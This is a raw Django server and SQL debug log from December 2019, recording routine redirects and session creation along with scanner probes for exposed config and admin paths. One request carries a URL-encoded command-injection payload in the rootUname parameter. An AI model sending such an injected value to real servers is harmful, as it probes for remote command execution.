"a" FROM "django_session" WHERE "django_session"."session_key" = '1fpyu6d3crypntuzq73ef8m8tnn42ulq' LIMIT 1; args=('1fpyu6d3crypntuzq73ef8m8tnn42ulq',) DEBUG 2019-12-02 08:39:19,249 utils 26999 140702605727488 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('1fpyu6d3crypntuzq73ef8m8tnn42ulq', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-16T08:39:19.248198+00:00'::timestamptz); args=('1fpyu6d3crypntuzq73ef8m8tnn42ulq', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 16, 8, 39, 19, 248198, tzinfo=)) [02/Dec/2019 08:39:19] "GET /login/?next=/ HTTP/1.0" 200 1786 [02/Dec/2019 08:43:13] "GET / HTTP/1.0" 302 0 [02/Dec/2019 08:48:14] "GET / HTTP/1.0" 302 0 [02/Dec/2019 08:53:25] "GET / HTTP/1.0" 302 0 [02/Dec/2019 08:58:30] "GET / HTTP/1.0" 302 0 [02/Dec/2019 09:03:38] "GET / HTTP/1.0" 302 0 [02/Dec/2019 09:08:44] "GET / HTTP/1.0" 302 0 [02/Dec/2019 09:13:50] "GET / HTTP/1.0" 302 0 [02/Dec/2019 09:18:50] "GET / HTTP/1.0" 302 0 [02/Dec/2019 09:21:50] "GET / HTTP/1.0" 302 0 [02/Dec/2019 09:24:02] "GET / HTTP/1.0" 302 0 [02/Dec/2019 09:28:56] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-02 09:28:56,757 utils 26999 140702605727488 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'clq4ppt29k03x6zz40sbyep8vwg7u25h' LIMIT 1; args=('clq4ppt29k03x6zz40sbyep8vwg7u25h',) DEBUG 2019-12-02 09:28:56,760 utils 26999 140702605727488 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('clq4ppt29k03x6zz40sbyep8vwg7u25h', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-16T09:28:56.758485+00:00'::timestamptz); args=('clq4ppt29k03x6zz40sbyep8vwg7u25h', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 16, 9, 28, 56, 758485, tzinfo=)) [02/Dec/2019 09:28:56] "GET /login/?next=/ HTTP/1.0" 200 1786 Not Found: /index.php [02/Dec/2019 09:28:56] "GET /index.php HTTP/1.0" 404 6402 [02/Dec/2019 09:29:05] "GET / HTTP/1.0" 302 0 [02/Dec/2019 09:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [02/Dec/2019 09:34:08] "GET / HTTP/1.0" 302 0 [02/Dec/2019 09:38:32] "GET / HTTP/1.0" 302 0 [02/Dec/2019 09:39:19] "GET / HTTP/1.0" 302 0 [02/Dec/2019 09:44:26] "GET / HTTP/1.0" 302 0 [02/Dec/2019 09:49:33] "GET / HTTP/1.0" 302 0 [02/Dec/2019 09:54:38] "GET / HTTP/1.0" 302 0 [02/Dec/2019 09:59:45] "GET / HTTP/1.0" 302 0 [02/Dec/2019 10:04:50] "GET / HTTP/1.0" 302 0 [02/Dec/2019 10:06:04] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-02 10:06:04,669 utils 26999 140702605727488 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '9u6836hf1kobye61m9p61lw2td58swos' LIMIT 1; args=('9u6836hf1kobye61m9p61lw2td58swos',) DEBUG 2019-12-02 10:06:04,672 utils 26999 140702605727488 (0.002) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('9u6836hf1kobye61m9p61lw2td58swos', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-16T10:06:04.669596+00:00'::timestamptz); args=('9u6836hf1kobye61m9p61lw2td58swos', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 16, 10, 6, 4, 669596, tzinfo=)) [02/Dec/2019 10:06:04] "GET /login/?next=/ HTTP/1.0" 200 1786 [02/Dec/2019 10:09:58] "GET / HTTP/1.0" 302 0 [02/Dec/2019 10:15:02] "GET / HTTP/1.0" 302 0 [02/Dec/2019 10:20:05] "GET / HTTP/1.0" 302 0 [02/Dec/2019 10:25:14] "GET / HTTP/1.0" 302 0 [02/Dec/2019 10:30:17] "GET / HTTP/1.0" 302 0 [02/Dec/2019 10:35:26] "GET / HTTP/1.0" 302 0 [02/Dec/2019 10:40:29] "GET / HTTP/1.0" 302 0 [02/Dec/2019 10:45:31] "GET / HTTP/1.0" 302 0 [02/Dec/2019 10:50:43] "GET / HTTP/1.0" 302 0 [02/Dec/2019 10:55:50] "GET / HTTP/1.0" 302 0 [02/Dec/2019 10:56:14] "GET / HTTP/1.0" 302 0 [02/Dec/2019 11:00:56] "GET / HTTP/1.0" 302 0 [02/Dec/2019 11:06:01] "GET / HTTP/1.0" 302 0 [02/Dec/2019 11:11:04] "GET / HTTP/1.0" 302 0 [02/Dec/2019 11:16:06] "GET / HTTP/1.0" 302 0 [02/Dec/2019 11:20:02] "GET / HTTP/1.0" 302 0 [02/Dec/2019 11:21:31] "HEAD / HTTP/1.0" 302 0 [02/Dec/2019 11:21:47] "GET / HTTP/1.0" 302 0 [02/Dec/2019 11:26:57] "GET / HTTP/1.0" 302 0 [02/Dec/2019 11:32:40] "GET / HTTP/1.0" 302 0 [02/Dec/2019 11:36:40] "GET / HTTP/1.0" 302 0 [02/Dec/2019 11:37:50] "GET / HTTP/1.0" 302 0 [02/Dec/2019 11:43:32] "GET / HTTP/1.0" 302 0 [02/Dec/2019 11:48:43] "GET / HTTP/1.0" 302 0 [02/Dec/2019 11:54:25] "GET / HTTP/1.0" 302 0 [02/Dec/2019 11:59:38] "GET / HTTP/1.0" 302 0 [02/Dec/2019 12:05:03] "GET / HTTP/1.0" 302 0 [02/Dec/2019 12:10:08] "GET / HTTP/1.0" 302 0 [02/Dec/2019 12:15:19] "GET / HTTP/1.0" 302 0 [02/Dec/2019 12:21:00] "GET / HTTP/1.0" 302 0 [02/Dec/2019 12:25:39] "GET / HTTP/1.0" 302 0 [02/Dec/2019 12:26:13] "GET / HTTP/1.0" 302 0 [02/Dec/2019 12:31:53] "GET / HTTP/1.0" 302 0 [02/Dec/2019 12:37:07] "GET / HTTP/1.0" 302 0 [02/Dec/2019 12:42:45] "GET / HTTP/1.0" 302 0 [02/Dec/2019 12:47:57] "GET / HTTP/1.0" 302 0 [02/Dec/2019 12:53:04] "GET / HTTP/1.0" 302 0 [02/Dec/2019 12:58:16] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-02 13:01:57,139 utils 26999 140702605727488 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-02T13:01:57.127465+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 2, 13, 1, 57, 127465, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-02 13:01:57,142 utils 26999 140702605727488 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-02 13:01:57,188 utils 26999 140702605727488 (0.003) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-02 13:01:57,192 utils 26999 140702605727488 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-16T13:01:57.190650+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 16, 13, 1, 57, 190650, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [02/Dec/2019 13:01:57] "GET / HTTP/1.0" 200 6019 Not Found: /favicon.ico [02/Dec/2019 13:02:00] "GET /favicon.ico HTTP/1.0" 404 6411 [02/Dec/2019 13:03:19] "GET / HTTP/1.0" 302 0 [02/Dec/2019 13:08:32] "GET / HTTP/1.0" 302 0 [02/Dec/2019 13:13:45] "GET / HTTP/1.0" 302 0 [02/Dec/2019 13:19:00] "GET / HTTP/1.0" 302 0 [02/Dec/2019 13:22:00] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-02 13:22:00,653 utils 26999 140702605727488 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'q6j3iu2sdmycfxzt8qb0gyfe0k2rig7q' LIMIT 1; args=('q6j3iu2sdmycfxzt8qb0gyfe0k2rig7q',) DEBUG 2019-12-02 13:22:00,656 utils 26999 140702605727488 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('q6j3iu2sdmycfxzt8qb0gyfe0k2rig7q', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-16T13:22:00.654264+00:00'::timestamptz); args=('q6j3iu2sdmycfxzt8qb0gyfe0k2rig7q', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 16, 13, 22, 0, 654264, tzinfo=)) [02/Dec/2019 13:22:00] "GET /login/?next=/ HTTP/1.0" 200 1786 [02/Dec/2019 13:24:08] "GET / HTTP/1.0" 302 0 [02/Dec/2019 13:29:16] "GET / HTTP/1.0" 302 0 [02/Dec/2019 13:34:23] "GET / HTTP/1.0" 302 0 [02/Dec/2019 13:39:30] "GET / HTTP/1.0" 302 0 [02/Dec/2019 13:44:36] "GET / HTTP/1.0" 302 0 [02/Dec/2019 13:49:39] "GET / HTTP/1.0" 302 0 [02/Dec/2019 13:54:46] "GET / HTTP/1.0" 302 0 [02/Dec/2019 13:59:53] "GET / HTTP/1.0" 302 0 [02/Dec/2019 14:04:54] "GET / HTTP/1.0" 302 0 [02/Dec/2019 14:04:59] "GET / HTTP/1.0" 302 0 [02/Dec/2019 14:10:06] "GET / HTTP/1.0" 302 0 [02/Dec/2019 14:15:14] "GET / HTTP/1.0" 302 0 [02/Dec/2019 14:20:23] "GET / HTTP/1.0" 302 0 [02/Dec/2019 14:25:32] "GET / HTTP/1.0" 302 0 [02/Dec/2019 14:30:36] "GET / HTTP/1.0" 302 0 [02/Dec/2019 14:35:39] "GET / HTTP/1.0" 302 0 [02/Dec/2019 14:40:54] "GET / HTTP/1.0" 302 0 [02/Dec/2019 14:45:58] "GET / HTTP/1.0" 302 0 [02/Dec/2019 14:50:01] "GET /whm-server-status HTTP/1.0" 301 0 [02/Dec/2019 14:51:03] "GET / HTTP/1.0" 302 0 [02/Dec/2019 14:56:10] "GET / HTTP/1.0" 302 0 [02/Dec/2019 15:01:15] "GET / HTTP/1.0" 302 0 [02/Dec/2019 15:03:50] "GET / HTTP/1.0" 302 0 [02/Dec/2019 15:06:23] "GET / HTTP/1.0" 302 0 [02/Dec/2019 15:11:28] "GET / HTTP/1.0" 302 0 [02/Dec/2019 15:16:35] "GET / HTTP/1.0" 302 0 [02/Dec/2019 15:21:41] "GET / HTTP/1.0" 302 0 [02/Dec/2019 15:24:10] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-02 15:24:10,793 utils 26999 140702605727488 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '2mxz312kicvybqjjy421hwzu741i346j' LIMIT 1; args=('2mxz312kicvybqjjy421hwzu741i346j',) DEBUG 2019-12-02 15:24:10,795 utils 26999 140702605727488 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('2mxz312kicvybqjjy421hwzu741i346j', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-16T15:24:10.794211+00:00'::timestamptz); args=('2mxz312kicvybqjjy421hwzu741i346j', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 16, 15, 24, 10, 794211, tzinfo=)) [02/Dec/2019 15:24:10] "GET /login/?next=/ HTTP/1.0" 200 1786 [02/Dec/2019 15:26:47] "GET / HTTP/1.0" 302 0 [02/Dec/2019 15:31:54] "GET / HTTP/1.0" 302 0 [02/Dec/2019 15:36:55] "GET / HTTP/1.0" 302 0 [02/Dec/2019 15:42:04] "GET / HTTP/1.0" 302 0 [02/Dec/2019 15:47:10] "GET / HTTP/1.0" 302 0 [02/Dec/2019 15:52:15] "GET / HTTP/1.0" 302 0 [02/Dec/2019 15:57:21] "GET / HTTP/1.0" 302 0 [02/Dec/2019 16:02:27] "GET / HTTP/1.0" 302 0 [02/Dec/2019 16:07:30] "GET / HTTP/1.0" 302 0 [02/Dec/2019 16:12:44] "GET / HTTP/1.0" 302 0 [02/Dec/2019 16:17:49] "GET / HTTP/1.0" 302 0 [02/Dec/2019 16:22:56] "GET / HTTP/1.0" 302 0 [02/Dec/2019 16:23:17] "GET / HTTP/1.0" 302 0 [02/Dec/2019 16:25:07] "GET / HTTP/1.0" 302 0 [02/Dec/2019 16:28:02] "GET / HTTP/1.0" 302 0 [02/Dec/2019 16:33:06] "GET / HTTP/1.0" 302 0 [02/Dec/2019 16:38:15] "GET / HTTP/1.0" 302 0 [02/Dec/2019 16:43:22] "GET / HTTP/1.0" 302 0 [02/Dec/2019 16:48:30] "GET / HTTP/1.0" 302 0 [02/Dec/2019 16:53:35] "GET / HTTP/1.0" 302 0 [02/Dec/2019 16:58:42] "GET / HTTP/1.0" 302 0 [02/Dec/2019 17:03:44] "GET / HTTP/1.0" 302 0 [02/Dec/2019 17:08:53] "GET / HTTP/1.0" 302 0 [02/Dec/2019 17:13:59] "GET / HTTP/1.0" 302 0 [02/Dec/2019 17:19:07] "GET / HTTP/1.0" 302 0 [02/Dec/2019 17:24:13] "GET / HTTP/1.0" 302 0 Not Found: /sftp-config.json [02/Dec/2019 17:26:02] "GET /sftp-config.json?x=x HTTP/1.0" 404 6427 [02/Dec/2019 17:29:18] "GET / HTTP/1.0" 302 0 [02/Dec/2019 17:34:25] "GET / HTTP/1.0" 302 0 [02/Dec/2019 17:39:29] "GET / HTTP/1.0" 302 0 [02/Dec/2019 17:44:35] "GET / HTTP/1.0" 302 0 [02/Dec/2019 17:49:42] "GET / HTTP/1.0" 302 0 [02/Dec/2019 17:54:45] "GET / HTTP/1.0" 302 0 [02/Dec/2019 17:59:53] "GET / HTTP/1.0" 302 0 [02/Dec/2019 18:04:58] "GET / HTTP/1.0" 302 0 [02/Dec/2019 18:09:54] "GET / HTTP/1.0" 302 0 [02/Dec/2019 18:10:06] "GET / HTTP/1.0" 302 0 [02/Dec/2019 18:15:09] "GET / HTTP/1.0" 302 0 [02/Dec/2019 18:20:12] "GET / HTTP/1.0" 302 0 [02/Dec/2019 18:25:25] "GET / HTTP/1.0" 302 0 [02/Dec/2019 18:30:30] "GET / HTTP/1.0" 302 0 [02/Dec/2019 18:35:37] "GET / HTTP/1.0" 302 0 [02/Dec/2019 18:40:42] "GET / HTTP/1.0" 302 0 [02/Dec/2019 18:45:42] "GET / HTTP/1.0" 302 0 [02/Dec/2019 18:50:44] "GET / HTTP/1.0" 302 0 [02/Dec/2019 18:55:55] "GET / HTTP/1.0" 302 0 [02/Dec/2019 19:01:03] "GET / HTTP/1.0" 302 0 [02/Dec/2019 19:06:06] "GET / HTTP/1.0" 302 0 [02/Dec/2019 19:11:16] "GET / HTTP/1.0" 302 0 [02/Dec/2019 19:16:20] "GET / HTTP/1.0" 302 0 [02/Dec/2019 19:21:29] "GET / HTTP/1.0" 302 0 [02/Dec/2019 19:26:33] "GET / HTTP/1.0" 302 0 [02/Dec/2019 19:31:40] "GET / HTTP/1.0" 302 0 Not Found: /install/lib/ajaxHandlers/ajaxServerSettingsChk.php [02/Dec/2019 19:33:23] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3Becho%20-n%20HellorConfig%7Cmd5sum%20%23 HTTP/1.0" 404 6578 [02/Dec/2019 19:36:41] "GET / HTTP/1.0" 302 0 [02/Dec/2019 19:41:50] "GET / HTTP/1.0" 302 0 [02/Dec/2019 19:46:56] "GET / HTTP/1.0" 302 0 [02/Dec/2019 19:52:01] "GET / HTTP/1.0" 302 0 [02/Dec/2019 19:54:10] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-02 19:54:10,940 utils 26999 140702605727488 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'maoewj3dn7gi9g548izabzbdac7g2f8m' LIMIT 1; args=('maoewj3dn7gi9g548izabzbdac7g2f8m',) DEBUG 2019-12-02 19:54:10,942 utils 26999 140702605727488 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('maoewj3dn7gi9g548izabzbdac7g2f8m', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-16T19:54:10.940941+00:00'::timestamptz); args=('maoewj3dn7gi9g548izabzbdac7g2f8m', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 16, 19, 54, 10, 940941, tzinfo=)) [02/Dec/2019 19:54:10] "GET /login/?next=/ HTTP/1.0" 200 1786 Not Found: /robots.txt [02/Dec/2019 19:54:11] "GET /robots.txt HTTP/1.0" 404 6406 [02/Dec/2019 19:57:08] "GET / HTTP/1.0" 302 0 [02/Dec/2019 20:02:13] "GET / HTTP/1.0" 302 0 [02/Dec/2019 20:07:18] "GET / HTTP/1.0" 302 0 [02/Dec/2019 20:12:25] "GET / HTTP/1.0" 302 0 [02/Dec/2019 20:17:28] "GET / HTTP/1.0" 302 0 [02/Dec/2019 20:22:36] "GET / HTTP/1.0" 302 0 [02/Dec/2019 20:27:41] "GET / HTTP/1.0" 302 0 [02/Dec/2019 20:30:59] "GET / HTTP/1.0" 302 0 [02/Dec/2019 20:32:47] "GET / HTTP/1.0" 302 0 [02/Dec/2019 20:37:51] "GET / HTTP/1.0" 302 0 [02/Dec/2019 20:43:00] "GET / HTTP/1.0" 302 0 [02/Dec/2019 20:48:03] "GET / HTTP/1.0" 302 0 [02/Dec/2019 20:53:11] "GET / HTTP/1.0" 302 0 [02/Dec/2019 20:58:17] "GET / HTTP/1.0" 302 0 [02/Dec/2019 21:01:31] "GET / HTTP/1.0" 302 0 [02/Dec/2019 21:03:22] "GET / HTTP/1.0" 302 0 [02/Dec/2019 21:08:29] "GET / HTTP/1.0" 302 0 [02/Dec/2019 21:13:32] "GET / HTTP/1.0" 302 0 [02/Dec/2019 21:16:46] "GET / HTTP/1.0" 302 0 [02/Dec/2019 21:18:42] "GET / HTTP/1.0" 302 0 [02/Dec/2019 21:23:47] "GET / HTTP/1.0" 302 0 [02/Dec/2019 21:28:49] "GET / HTTP/1.0" 302 0 [02/Dec/2019 21:33:58] "GET / HTTP/1.0" 302 0 [02/Dec/2019 21:39:01] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [02/Dec/2019 21:41:38] "GET /proxy.php HTTP/1.0" 404 6409 [02/Dec/2019 21:44:10] "GET / HTTP/1.0" 302 0 [02/Dec/2019 21:49:15] "GET / HTTP/1.0" 302 0 [02/Dec/2019 21:54:20] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [02/Dec/2019 21:56:11] "GET /robots.txt HTTP/1.0" 404 6406 Not Found: /ShowAuthor.asp [02/Dec/2019 21:56:13] "GET /ShowAuthor.asp?ChannelID=1002&AuthorName=%C2%B2%C3%94%C3%84%C3%8F%C2%BD%C3%8C%C3%93%C3%BD%C3%8D%C3%B8 HTTP/1.0" 404 6509 Not Found: /jyky/ShowClass.asp [02/Dec/2019 21:56:15] "GET /jyky/ShowClass.asp?ClassID=%E6%AF%8D%E8%AF%AD%E6%98%AF%E5%AD%95%E8%82%B2%E6%96%87%E5%AD%A6%E7%9A%84%E8%83%8E%E5%BA%8A7&page=%E6%AF%8D%E8%AF%AD%E6%98%AF%E5%AD%95%E8%82%B2%E6%96%87%E5%AD%A6%E7%9A%84%E8%83%8E%E5%BA%8A HTTP/1.0" 404 6630 [02/Dec/2019 21:59:23] "GET / HTTP/1.0" 302 0 [02/Dec/2019 22:04:30] "GET / HTTP/1.0" 302 0 [02/Dec/2019 22:09:36] "GET / HTTP/1.0" 302 0 [02/Dec/2019 22:14:43] "GET / HTTP/1.0" 302 0 [02/Dec/2019 22:19:46] "GET / HTTP/1.0" 302 0 [02/Dec/2019 22:24:47] "GET / HTTP/1.0" 302 0 [02/Dec/2019 22:30:01] "GET / HTTP/1.0" 302 0 [02/Dec/2019 22:35:05] "GET / HTTP/1.0" 302 0 Not Found: /manager/html [02/Dec/2019 22:36:19] "GET /manager/html HTTP/1.0" 404 6411 [02/Dec/2019 22:40:10] "GET / HTTP/1.0" 302 0 [02/Dec/2019 22:45:17] "GET / HTTP/1.0" 302 0 [02/Dec/2019 22:50:23] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [02/Dec/2019 22:54:02] "GET /proxy.php HTTP/1.0" 404 6411 [02/Dec/2019 22:55:28] "GET / HTTP/1.0" 302 0 [02/Dec/2019 23:00:01] "GET /whm-server-status HTTP/1.0" 301 0 [02/Dec/2019 23:00:34] "GET / HTTP/1.0" 302 0 [02/Dec/2019 23:05:40] "GET / HTTP/1.0" 302 0 [02/Dec/2019 23:10:42] "GET / HTTP/1.0" 302 0 [02/Dec/2019 23:15:51] "GET / HTTP/1.0" 302 0 [02/Dec/2019 23:20:57] "GET / HTTP/1.0" 302 0 [02/Dec/2019 23:26:01] "GET / HTTP/1.0" 302 0 [02/Dec/2019 23:31:06] "GET / HTTP/1.0" 302 0 [02/Dec/2019 23:35:43] "GET / HTTP/1.0" 302 0 [02/Dec/2019 23:36:12] "GET / HTTP/1.0" 302 0 [02/Dec/2019 23:36:19] "GET / HTTP/1.0" 302 0 [02/Dec/2019 23:41:16] "GET / HTTP/1.0" 302 0 [02/Dec/2019 23:44:27] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-02 23:44:30,745 utils 26999 140702605727488 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '6xx21r3jrgijl1d0l94jkkw0kux2sia9' LIMIT 1; args=('6xx21r3jrgijl1d0l94jkkw0kux2sia9',) DEBUG 2019-12-02 23:44:30,747 utils 26999 140702605727488 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('6xx21r3jrgijl1d0l94jkkw0kux2sia9', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-16T23:44:30.746407+00:00'::timestamptz); args=('6xx21r3jrgijl1d0l94jkkw0kux2sia9', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 16, 23, 44, 30, 746407, tzinfo=)) [02/Dec/2019 23:44:30] "GET /login/?next=/ HTTP/1.0" 200 1786 [02/Dec/2019 23:46:24] "GET / HTTP/1.0" 302 0 [02/Dec/2019 23:51:31] "GET / HTTP/1.0" 302 0 [02/Dec/2019 23:54:10] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-02 23:54:10,872 utils 26999 140702605727488 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'sm2yexmgupfggosge80tocbd4e013v26' LIMIT 1; args=('sm2yexmgupfggosge80tocbd4e013v26',) DEBUG 2019-12-02 23:54:10,875 utils 26999 140702605727488 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('sm2yexmgupfggosge80tocbd4e013v26', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-16T23:54:10.873315+00:00'::timestamptz); args=('sm2yexmgupfggosge80tocbd4e013v26', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 16, 23, 54, 10, 873315, tzinfo=)) [02/Dec/2019 23:54:10] "GET /login/?next=/ HTTP/1.0" 200 1786 [02/Dec/2019 23:56:36] "GET / HTTP/1.0" 302 0 [03/Dec/2019 00:01:44] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [03/Dec/2019 00:06:09] "GET /proxy.php HTTP/1.0" 404 6411 [03/Dec/2019 00:06:49] "GET / HTTP/1.0" 302 0 [03/Dec/2019 00:11:53] "GET / HTTP/1.0" 302 0 [03/Dec/2019 00:17:01] "GET / HTTP/1.0" 302 0 [03/Dec/2019 00:20:01] "GET /whm-server-status HTTP/1.0" 301 0 [03/Dec/2019 00:22:04] "GET / HTTP/1.0" 302 0 [03/Dec/2019 00:27:13] "GET / HTTP/1.0" 302 0 [03/Dec/2019 00:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [03/Dec/2019 00:32:15] "GET / HTTP/1.0" 302 0 [03/Dec/2019 00:37:24] "GET / HTTP/1.0" 302 0 [03/Dec/2019 00:42:30] "GET / HTTP/1.0" 302 0 [03/Dec/2019 00:47:15] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-03 00:47:16,217 utils 26999 140702605727488 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ynnuomcxq2dm5sn6k3jxkxy7xaqse4c7' LIMIT 1; args=('ynnuomcxq2dm5sn6k3jxkxy7xaqse4c7',) DEBUG 2019-12-03 00:47:16,220 utils 26999 140702605727488 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ynnuomcxq2dm5sn6k3jxkxy7xaqse4c7', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-17T00:47:16.218475+00:00'::timestamptz); args=('ynnuomcxq2dm5sn6k3jxkxy7xaqse4c7', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 17, 0, 47, 16, 218475, tzinfo=)) [03/Dec/2019 00:47:16] "GET /login/?next=/ HTTP/1.0" 200 1786 Not Found: /index.php [03/Dec/2019 00:47:16] "GET /index.php HTTP/1.0" 404 6402 [03/Dec/2019 00:47:34] "GET / HTTP/1.0" 302 0 [03/Dec/2019 00:52:41] "GET / HTTP/1.0" 302 0 [03/Dec/2019 00:57:45] "GET / HTTP/1.0" 302 0 [03/Dec/2019 01:02:52] "GET / HTTP/1.0" 302 0 [03/Dec/2019 01:07:50] "GET / HTTP/1.0" 302 0 [03/Dec/2019 01:07:57] "GET / HTTP/1.0" 302 0 